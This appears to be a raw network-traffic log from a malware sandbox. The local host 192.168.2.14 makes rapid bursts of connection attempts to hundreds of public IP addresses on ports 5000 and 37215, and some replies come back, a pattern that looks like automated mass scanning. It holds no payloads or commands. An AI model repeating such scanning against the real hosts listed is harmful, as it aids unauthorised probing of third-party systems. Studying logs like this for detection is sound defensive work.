                                                    Jul 10, 2024 08:26:09.763976097 CEST486115000192.168.2.14211.253.210.133
                                                    Jul 10, 2024 08:26:09.764918089 CEST486115000192.168.2.14211.57.3.22
                                                    Jul 10, 2024 08:26:09.764918089 CEST486115000192.168.2.14211.47.66.220
                                                    Jul 10, 2024 08:26:09.764918089 CEST486115000192.168.2.14211.240.96.75
                                                    Jul 10, 2024 08:26:09.764918089 CEST486115000192.168.2.14211.227.226.41
                                                    Jul 10, 2024 08:26:09.764918089 CEST4708337215192.168.2.14197.152.230.54
                                                    Jul 10, 2024 08:26:09.764918089 CEST4708337215192.168.2.14185.174.105.50
                                                    Jul 10, 2024 08:26:09.764918089 CEST4708337215192.168.2.1441.192.67.145
                                                    Jul 10, 2024 08:26:09.764918089 CEST4708337215192.168.2.14157.181.35.159
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.145.162.181
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.158.30.43
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.174.165.89
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.198.35.144
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.120.5.38
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.163.126.154
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.76.4.16
                                                    Jul 10, 2024 08:26:09.767469883 CEST486115000192.168.2.14211.157.45.121
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.131.167.231
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.96.38.204
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.42.228.216
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.172.0.133
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.17.18.143
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.50.117.6
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.3.125.126
                                                    Jul 10, 2024 08:26:09.768052101 CEST486115000192.168.2.14211.224.185.208
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.41.148.119
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.239.232.109
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.181.216.185
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.158.67.141
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.240.86.217
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.200.32.181
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.106.99.113
                                                    Jul 10, 2024 08:26:09.768214941 CEST486115000192.168.2.14211.67.249.254
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.1441.175.199.189
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.1441.235.93.64
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.1441.149.98.103
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.14197.144.158.209
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.1441.121.103.36
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.14145.170.85.227
                                                    Jul 10, 2024 08:26:09.769351959 CEST4708337215192.168.2.14123.136.248.253
                                                    Jul 10, 2024 08:26:09.769352913 CEST4708337215192.168.2.1441.5.103.111
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.140.37.109
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.202.34.91
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.229.109.115
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.135.181.159
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.182.27.90
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.126.216.86
                                                    Jul 10, 2024 08:26:09.770196915 CEST486115000192.168.2.14211.34.100.224
                                                    Jul 10, 2024 08:26:09.770198107 CEST486115000192.168.2.14211.198.122.197
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.100.93.94
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.150.228.242
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.102.115.252
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.243.55.75
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.62.36.168
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.50.249.97
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.107.170.218
                                                    Jul 10, 2024 08:26:09.770647049 CEST486115000192.168.2.14211.100.153.174
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.252.233.73
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.155.165.138
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.30.13.162
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.121.58.11
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.94.189.244
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.112.2.248
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.204.8.156
                                                    Jul 10, 2024 08:26:09.771136045 CEST486115000192.168.2.14211.158.106.91
                                                    Jul 10, 2024 08:26:09.771142006 CEST500048611211.100.170.125192.168.2.14
                                                    Jul 10, 2024 08:26:09.771164894 CEST500048611211.15.119.210192.168.2.14
                                                    Jul 10, 2024 08:26:09.771178007 CEST500048611211.206.145.159192.168.2.14
                                                    Jul 10, 2024 08:26:09.771190882 CEST500048611211.15.58.212192.168.2.14
                                                    Jul 10, 2024 08:26:09.771202087 CEST500048611211.4.127.23192.168.2.14
                                                    Jul 10, 2024 08:26:09.771213055 CEST500048611211.187.17.170192.168.2.14
                                                    Jul 10, 2024 08:26:09.771225929 CEST500048611211.74.239.2192.168.2.14
                                                    Jul 10, 2024 08:26:09.771236897 CEST500048611211.226.0.161192.168.2.14
                                                    Jul 10, 2024 08:26:09.771250963 CEST500048611211.122.234.253192.168.2.14
                                                    Jul 10, 2024 08:26:09.771264076 CEST500048611211.21.165.166192.168.2.14
                                                    Jul 10, 2024 08:26:09.771277905 CEST500048611211.214.29.6192.168.2.14
                                                    Jul 10, 2024 08:26:09.771290064 CEST500048611211.106.236.156192.168.2.14
                                                    Jul 10, 2024 08:26:09.771302938 CEST500048611211.87.193.154192.168.2.14
                                                    Jul 10, 2024 08:26:09.771313906 CEST500048611211.56.105.79192.168.2.14
                                                    Jul 10, 2024 08:26:09.771327972 CEST500048611211.166.208.50192.168.2.14
                                                    Jul 10, 2024 08:26:09.771339893 CEST500048611211.37.58.231192.168.2.14
                                                    Jul 10, 2024 08:26:09.771353006 CEST500048611211.209.79.115192.168.2.14
                                                    Jul 10, 2024 08:26:09.771363974 CEST500048611211.242.7.149192.168.2.14
                                                    Jul 10, 2024 08:26:09.771375895 CEST500048611211.96.15.27192.168.2.14
                                                    Jul 10, 2024 08:26:09.771389008 CEST500048611211.100.198.133192.168.2.14
                                                    Jul 10, 2024 08:26:09.771399975 CEST500048611211.250.80.201192.168.2.14
                                                    Jul 10, 2024 08:26:09.771414995 CEST500048611211.166.144.44192.168.2.14
                                                    Jul 10, 2024 08:26:09.771426916 CEST500048611211.195.160.169192.168.2.14
                                                    Jul 10, 2024 08:26:09.771437883 CEST500048611211.77.215.139192.168.2.14
                                                    Jul 10, 2024 08:26:09.771450996 CEST500048611211.223.92.122192.168.2.14
                                                    Jul 10, 2024 08:26:09.771461964 CEST500048611211.182.69.219192.168.2.14
                                                    Jul 10, 2024 08:26:09.771477938 CEST500048611211.67.183.223192.168.2.14
                                                    Jul 10, 2024 08:26:09.771488905 CEST500048611211.215.166.127192.168.2.14
                                                    Jul 10, 2024 08:26:09.771502972 CEST500048611211.95.111.40192.168.2.14
                                                    Jul 10, 2024 08:26:09.771513939 CEST500048611211.248.157.155192.168.2.14
                                                    Jul 10, 2024 08:26:09.771526098 CEST500048611211.89.250.18192.168.2.14
                                                    Jul 10, 2024 08:26:09.771538019 CEST500048611211.57.228.194192.168.2.14
                                                    Jul 10, 2024 08:26:09.771548986 CEST500048611211.251.53.49192.168.2.14
                                                    Jul 10, 2024 08:26:09.771560907 CEST500048611211.144.203.210192.168.2.14
                                                    Jul 10, 2024 08:26:09.771573067 CEST500048611211.57.250.47192.168.2.14
                                                    Jul 10, 2024 08:26:09.771584034 CEST500048611211.181.243.250192.168.2.14
                                                    Jul 10, 2024 08:26:09.771595001 CEST500048611211.179.152.197192.168.2.14
                                                    Jul 10, 2024 08:26:09.771605968 CEST500048611211.223.165.149192.168.2.14
                                                    Jul 10, 2024 08:26:09.771617889 CEST500048611211.77.70.230192.168.2.14
                                                    Jul 10, 2024 08:26:09.771629095 CEST500048611211.158.21.150192.168.2.14
                                                    Jul 10, 2024 08:26:09.771641016 CEST500048611211.13.216.97192.168.2.14
                                                    Jul 10, 2024 08:26:09.771651030 CEST500048611211.120.81.149192.168.2.14
                                                    Jul 10, 2024 08:26:09.771662951 CEST500048611211.247.163.74192.168.2.14
                                                    Jul 10, 2024 08:26:09.771673918 CEST500048611211.253.159.17192.168.2.14
                                                    Jul 10, 2024 08:26:09.771684885 CEST500048611211.20.49.42192.168.2.14
                                                    Jul 10, 2024 08:26:09.771696091 CEST500048611211.53.169.232192.168.2.14
                                                    Jul 10, 2024 08:26:09.771707058 CEST500048611211.5.237.113192.168.2.14
                                                    Jul 10, 2024 08:26:09.771717072 CEST500048611211.163.126.96192.168.2.14
                                                    Jul 10, 2024 08:26:09.771728992 CEST500048611211.163.52.34192.168.2.14
                                                    Jul 10, 2024 08:26:09.771744967 CEST500048611211.190.168.167192.168.2.14
                                                    Jul 10, 2024 08:26:09.771755934 CEST500048611211.235.203.190192.168.2.14
                                                    Jul 10, 2024 08:26:09.771768093 CEST500048611211.3.117.41192.168.2.14
                                                    Jul 10, 2024 08:26:09.771779060 CEST500048611211.82.113.45192.168.2.14
                                                    Jul 10, 2024 08:26:09.771790028 CEST500048611211.213.51.52192.168.2.14
                                                    Jul 10, 2024 08:26:09.771800995 CEST500048611211.147.108.105192.168.2.14
                                                    Jul 10, 2024 08:26:09.771811962 CEST500048611211.57.3.22192.168.2.14
                                                    Jul 10, 2024 08:26:09.771821976 CEST500048611211.111.197.27192.168.2.14
                                                    Jul 10, 2024 08:26:09.771833897 CEST500048611211.140.171.106192.168.2.14
                                                    Jul 10, 2024 08:26:09.771845102 CEST500048611211.47.66.220192.168.2.14
                                                    Jul 10, 2024 08:26:09.771879911 CEST500048611211.191.202.211192.168.2.14
                                                    Jul 10, 2024 08:26:09.772136927 CEST500048611211.117.164.100192.168.2.14
                                                    Jul 10, 2024 08:26:09.772635937 CEST500048611211.240.96.75192.168.2.14
                                                    Jul 10, 2024 08:26:09.772653103 CEST486115000192.168.2.14211.158.196.163
                                                    Jul 10, 2024 08:26:09.772653103 CEST486115000192.168.2.14211.200.64.238
                                                    Jul 10, 2024 08:26:09.772653103 CEST486115000192.168.2.14211.70.49.203
                                                    Jul 10, 2024 08:26:09.772653103 CEST4708337215192.168.2.14163.137.150.13
                                                    Jul 10, 2024 08:26:09.772653103 CEST4708337215192.168.2.14197.227.245.236
                                                    Jul 10, 2024 08:26:09.772654057 CEST4708337215192.168.2.14157.102.74.35
                                                    Jul 10, 2024 08:26:09.772654057 CEST4708337215192.168.2.14197.52.106.126
                                                    Jul 10, 2024 08:26:09.772857904 CEST500048611211.28.86.31192.168.2.14
                                                    Jul 10, 2024 08:26:09.772996902 CEST500048611211.227.38.134192.168.2.14
                                                    Jul 10, 2024 08:26:09.773184061 CEST500048611211.139.215.94192.168.2.14
                                                    Jul 10, 2024 08:26:09.773293018 CEST500048611211.145.162.181192.168.2.14
                                                    Jul 10, 2024 08:26:09.773320913 CEST500048611211.227.226.41192.168.2.14
                                                    Jul 10, 2024 08:26:09.773350954 CEST500048611211.158.30.43192.168.2.14
                                                    Jul 10, 2024 08:26:09.773379087 CEST500048611211.107.22.127192.168.2.14
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.146.165.56
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.0.22.179
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.40.187.229
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.108.23.58
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.20.216.139
                                                    Jul 10, 2024 08:26:09.773406029 CEST486115000192.168.2.14211.63.74.205
                                                    Jul 10, 2024 08:26:09.773406982 CEST486115000192.168.2.14211.25.74.117
                                                    Jul 10, 2024 08:26:09.773406982 CEST486115000192.168.2.14211.163.154.137
                                                    Jul 10, 2024 08:26:09.773601055 CEST500048611211.174.165.89192.168.2.14
                                                    Jul 10, 2024 08:26:09.773696899 CEST500048611211.157.9.52192.168.2.14
                                                    Jul 10, 2024 08:26:09.773725986 CEST500048611211.68.221.35192.168.2.14
                                                    Jul 10, 2024 08:26:09.773932934 CEST500048611211.131.167.231192.168.2.14
                                                    Jul 10, 2024 08:26:09.774111032 CEST500048611211.231.212.159192.168.2.14
                                                    Jul 10, 2024 08:26:09.774533987 CEST500048611211.152.181.117192.168.2.14
                                                    Jul 10, 2024 08:26:09.774635077 CEST500048611211.246.40.14192.168.2.14
                                                    Jul 10, 2024 08:26:09.774739027 CEST500048611211.198.35.144192.168.2.14
                                                    Jul 10, 2024 08:26:09.774786949 CEST500048611211.96.38.204192.168.2.14
                                                    Jul 10, 2024 08:26:09.775240898 CEST500048611211.42.228.216192.168.2.14
                                                    Jul 10, 2024 08:26:09.775309086 CEST500048611211.221.144.208192.168.2.14
                                                    Jul 10, 2024 08:26:09.775372028 CEST500048611211.40.248.75192.168.2.14
                                                    Jul 10, 2024 08:26:09.775494099 CEST500048611211.120.5.38192.168.2.14
                                                    Jul 10, 2024 08:26:09.775543928 CEST500048611211.253.210.133192.168.2.14
                                                    Jul 10, 2024 08:26:09.775691986 CEST500048611211.172.0.133192.168.2.14
                                                    Jul 10, 2024 08:26:09.775890112 CEST4708337215192.168.2.1486.154.79.29
                                                    Jul 10, 2024 08:26:09.775890112 CEST4708337215192.168.2.14185.164.141.71
                                                    Jul 10, 2024 08:26:09.775890112 CEST4708337215192.168.2.14157.175.114.73
                                                    Jul 10, 2024 08:26:09.775890112 CEST4708337215192.168.2.14157.68.28.54
                                                    Jul 10, 2024 08:26:09.775891066 CEST4708337215192.168.2.1441.41.180.116
                                                    Jul 10, 2024 08:26:09.775891066 CEST4708337215192.168.2.14206.104.18.133
                                                    Jul 10, 2024 08:26:09.775891066 CEST4708337215192.168.2.14197.21.90.246
                                                    Jul 10, 2024 08:26:09.775891066 CEST4708337215192.168.2.14197.214.68.20
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.95.154.202
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.158.139.12
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.89.51.15
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.92.97.152
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.100.99.209
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.208.104.108
                                                    Jul 10, 2024 08:26:09.776184082 CEST486115000192.168.2.14211.193.187.139
                                                    Jul 10, 2024 08:26:09.776782990 CEST500048611211.163.126.154192.168.2.14
                                                    Jul 10, 2024 08:26:09.776928902 CEST500048611211.76.4.16192.168.2.14
                                                    Jul 10, 2024 08:26:09.777131081 CEST500048611211.17.18.143192.168.2.14
                                                    Jul 10, 2024 08:26:09.777194977 CEST500048611211.100.93.94192.168.2.14
                                                    Jul 10, 2024 08:26:09.777287960 CEST486115000192.168.2.14211.216.183.169
                                                    Jul 10, 2024 08:26:09.777287960 CEST486115000192.168.2.14211.203.62.241
                                                    Jul 10, 2024 08:26:09.777287960 CEST486115000192.168.2.14211.23.151.157
                                                    Jul 10, 2024 08:26:09.777287960 CEST486115000192.168.2.14211.5.180.152
                                                    Jul 10, 2024 08:26:09.777287960 CEST486115000192.168.2.14211.220.9.125
                                                    Jul 10, 2024 08:26:09.777288914 CEST486115000192.168.2.14211.44.68.114
                                                    Jul 10, 2024 08:26:09.777288914 CEST486115000192.168.2.14211.60.31.95
                                                    Jul 10, 2024 08:26:09.777288914 CEST486115000192.168.2.14211.59.21.83
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.1441.149.109.197
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.14157.101.215.139
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.14174.114.227.250
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.1418.58.222.60
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.14157.52.65.140
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.1441.18.59.22
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.14177.47.141.82
                                                    Jul 10, 2024 08:26:09.777458906 CEST4708337215192.168.2.14197.206.94.122
                                                    Jul 10, 2024 08:26:09.778305054 CEST500048611211.50.117.6192.168.2.14
                                                    Jul 10, 2024 08:26:09.778393030 CEST500048611211.252.233.73192.168.2.14
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.49.250.185
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.80.21.73
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.204.131.209
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.0.41.127
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.121.127.186
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.168.7.224
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.110.143.187
                                                    Jul 10, 2024 08:26:09.778531075 CEST486115000192.168.2.14211.22.204.44
                                                    Jul 10, 2024 08:26:09.778620005 CEST500048611211.157.45.121192.168.2.14
                                                    Jul 10, 2024 08:26:09.778733015 CEST500048611211.3.125.126192.168.2.14
                                                    Jul 10, 2024 08:26:09.778819084 CEST500048611211.150.228.242192.168.2.14
                                                    Jul 10, 2024 08:26:09.779647112 CEST500048611211.155.165.138192.168.2.14
                                                    Jul 10, 2024 08:26:09.779675961 CEST486115000192.168.2.14211.72.199.86
                                                    Jul 10, 2024 08:26:09.779675961 CEST486115000192.168.2.14211.225.3.143
                                                    Jul 10, 2024 08:26:09.779675961 CEST486115000192.168.2.14211.24.106.214
                                                    Jul 10, 2024 08:26:09.779676914 CEST486115000192.168.2.14211.173.41.75
                                                    Jul 10, 2024 08:26:09.779676914 CEST486115000192.168.2.14211.196.216.11
                                                    Jul 10, 2024 08:26:09.779676914 CEST486115000192.168.2.14211.19.230.238
                                                    Jul 10, 2024 08:26:09.779676914 CEST486115000192.168.2.14211.2.174.113
                                                    Jul 10, 2024 08:26:09.779676914 CEST486115000192.168.2.14211.27.166.106
                                                    Jul 10, 2024 08:26:09.779687881 CEST500048611211.224.185.208192.168.2.14
                                                    Jul 10, 2024 08:26:09.779716969 CEST500048611211.30.13.162192.168.2.14
                                                    Jul 10, 2024 08:26:09.779752970 CEST500048611211.146.165.56192.168.2.14
                                                    Jul 10, 2024 08:26:09.779771090 CEST500048611211.158.196.163192.168.2.14
                                                    Jul 10, 2024 08:26:09.779840946 CEST500048611211.0.22.179192.168.2.14
                                                    Jul 10, 2024 08:26:09.779934883 CEST500048611211.200.64.238192.168.2.14
                                                    Jul 10, 2024 08:26:09.779943943 CEST500048611211.40.187.229192.168.2.14
                                                    Jul 10, 2024 08:26:09.779987097 CEST500048611211.121.58.11192.168.2.14
                                                    Jul 10, 2024 08:26:09.779995918 CEST500048611211.70.49.203192.168.2.14
                                                    Jul 10, 2024 08:26:09.780051947 CEST500048611211.94.189.244192.168.2.14
                                                    Jul 10, 2024 08:26:09.780512094 CEST500048611211.112.2.248192.168.2.14
                                                    Jul 10, 2024 08:26:09.780849934 CEST500048611211.204.8.156192.168.2.14
                                                    Jul 10, 2024 08:26:09.780965090 CEST500048611211.158.106.91192.168.2.14
                                                    Jul 10, 2024 08:26:09.781157017 CEST500048611211.102.115.252192.168.2.14
                                                    Jul 10, 2024 08:26:09.781440020 CEST500048611211.243.55.75192.168.2.14
                                                    Jul 10, 2024 08:26:09.781508923 CEST500048611211.95.154.202192.168.2.14
                                                    Jul 10, 2024 08:26:09.781739950 CEST500048611211.158.139.12192.168.2.14
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.119.243.130
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.200.245.57
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.222.226.131
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.127.240.210
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.90.29.197
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.118.216.142
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.66.55.232
                                                    Jul 10, 2024 08:26:09.781850100 CEST486115000192.168.2.14211.128.96.150
                                                    Jul 10, 2024 08:26:09.781987906 CEST486115000192.168.2.14211.102.241.180
                                                    Jul 10, 2024 08:26:09.781987906 CEST486115000192.168.2.14211.246.187.42
                                                    Jul 10, 2024 08:26:09.781987906 CEST486115000192.168.2.14211.163.249.240
                                                    Jul 10, 2024 08:26:09.781989098 CEST486115000192.168.2.14211.109.255.54
                                                    Jul 10, 2024 08:26:09.781989098 CEST486115000192.168.2.14211.130.199.66
                                                    Jul 10, 2024 08:26:09.781989098 CEST486115000192.168.2.14211.164.234.199
                                                    Jul 10, 2024 08:26:09.781989098 CEST486115000192.168.2.14211.18.208.36
                                                    Jul 10, 2024 08:26:09.782040119 CEST500048611211.62.36.168192.168.2.14
                                                    Jul 10, 2024 08:26:09.782670975 CEST500048611211.108.23.58192.168.2.14
                                                    Jul 10, 2024 08:26:09.782846928 CEST500048611211.50.249.97192.168.2.14
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.1441.89.167.115
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.1441.95.25.90
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.14122.166.54.208
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.1441.130.72.223
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.14157.192.152.68
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.1441.147.145.189
                                                    Jul 10, 2024 08:26:09.782896042 CEST4708337215192.168.2.14208.150.203.118
                                                    Jul 10, 2024 08:26:09.783051014 CEST500048611211.89.51.15192.168.2.14
                                                    Jul 10, 2024 08:26:09.783082962 CEST500048611211.107.170.218192.168.2.14
                                                    Jul 10, 2024 08:26:09.783269882 CEST500048611211.92.97.152192.168.2.14
                                                    Jul 10, 2024 08:26:09.783474922 CEST500048611211.100.153.174192.168.2.14
                                                    Jul 10, 2024 08:26:09.783595085 CEST500048611211.20.216.139192.168.2.14
                                                    Jul 10, 2024 08:26:09.783802986 CEST500048611211.49.250.185192.168.2.14
                                                    Jul 10, 2024 08:26:09.783945084 CEST500048611211.63.74.205192.168.2.14
                                                    Jul 10, 2024 08:26:09.784224033 CEST486115000192.168.2.14211.118.83.159
                                                    Jul 10, 2024 08:26:09.784224033 CEST486115000192.168.2.14211.116.174.105
                                                    Jul 10, 2024 08:26:09.784224033 CEST486115000192.168.2.14211.133.185.162
                                                    Jul 10, 2024 08:26:09.784224033 CEST4708337215192.168.2.14150.44.188.59
                                                    Jul 10, 2024 08:26:09.784224033 CEST4708337215192.168.2.14157.18.47.98
                                                    Jul 10, 2024 08:26:09.784224033 CEST4708337215192.168.2.142.247.127.226
                                                    Jul 10, 2024 08:26:09.784224033 CEST4708337215192.168.2.14197.207.152.192
                                                    Jul 10, 2024 08:26:09.784224987 CEST4708337215192.168.2.14157.223.176.239
                                                    Jul 10, 2024 08:26:09.784375906 CEST500048611211.25.74.117192.168.2.14
                                                    Jul 10, 2024 08:26:09.784466982 CEST500048611211.80.21.73192.168.2.14
                                                    Jul 10, 2024 08:26:09.784647942 CEST500048611211.163.154.137192.168.2.14
                                                    Jul 10, 2024 08:26:09.784862041 CEST4708337215192.168.2.14157.98.197.150
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.242.178.175
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.96.207.168
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.86.96.210
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.219.2.156
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.219.25.93
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.55.32.185
                                                    Jul 10, 2024 08:26:09.784862041 CEST486115000192.168.2.14211.190.220.227
                                                    Jul 10, 2024 08:26:09.785084963 CEST500048611211.100.99.209192.168.2.14
                                                    Jul 10, 2024 08:26:09.785166979 CEST500048611211.204.131.209192.168.2.14
                                                    Jul 10, 2024 08:26:09.786065102 CEST500048611211.0.41.127192.168.2.14
                                                    Jul 10, 2024 08:26:09.786133051 CEST500048611211.72.199.86192.168.2.14
                                                    Jul 10, 2024 08:26:09.786387920 CEST500048611211.208.104.108192.168.2.14
                                                    Jul 10, 2024 08:26:09.786603928 CEST486115000192.168.2.14211.206.225.24
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.128.193.128
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.159.171.182
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.124.237.52
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.13.56.146
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.146.5.131
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.38.234.235
                                                    Jul 10, 2024 08:26:09.786604881 CEST486115000192.168.2.14211.205.195.152
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.14184.60.128.24
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.14197.224.239.253
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.14135.145.13.232
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.1441.255.37.5
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.14157.72.66.3
                                                    Jul 10, 2024 08:26:09.786880016 CEST4708337215192.168.2.14197.198.16.171
                                                    Jul 10, 2024 08:26:09.786880970 CEST4708337215192.168.2.14197.223.150.229
                                                    Jul 10, 2024 08:26:09.786880970 CEST4708337215192.168.2.14124.241.189.58
                                                    Jul 10, 2024 08:26:09.787606001 CEST500048611211.225.3.143192.168.2.14
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14130.62.248.59
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14157.118.12.121
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14131.113.70.225
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.1481.152.255.200
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14157.47.32.31
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14157.183.59.240
                                                    Jul 10, 2024 08:26:09.787715912 CEST4708337215192.168.2.14157.116.96.172
                                                    Jul 10, 2024 08:26:09.787715912 CEST486115000192.168.2.14211.62.246.145
                                                    Jul 10, 2024 08:26:09.788866043 CEST500048611211.121.127.186192.168.2.14
                                                    Jul 10, 2024 08:26:09.788948059 CEST500048611211.24.106.214192.168.2.14
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.245.64.163
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.149.215.249
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.134.68.37
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.202.247.124
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.63.220.104
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.107.33.149
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.167.214.151
                                                    Jul 10, 2024 08:26:09.788971901 CEST486115000192.168.2.14211.32.196.18
                                                    Jul 10, 2024 08:26:09.789252996 CEST500048611211.193.187.139192.168.2.14
                                                    Jul 10, 2024 08:26:09.789427996 CEST500048611211.173.41.75192.168.2.14
                                                    Jul 10, 2024 08:26:09.790507078 CEST500048611211.168.7.224192.168.2.14
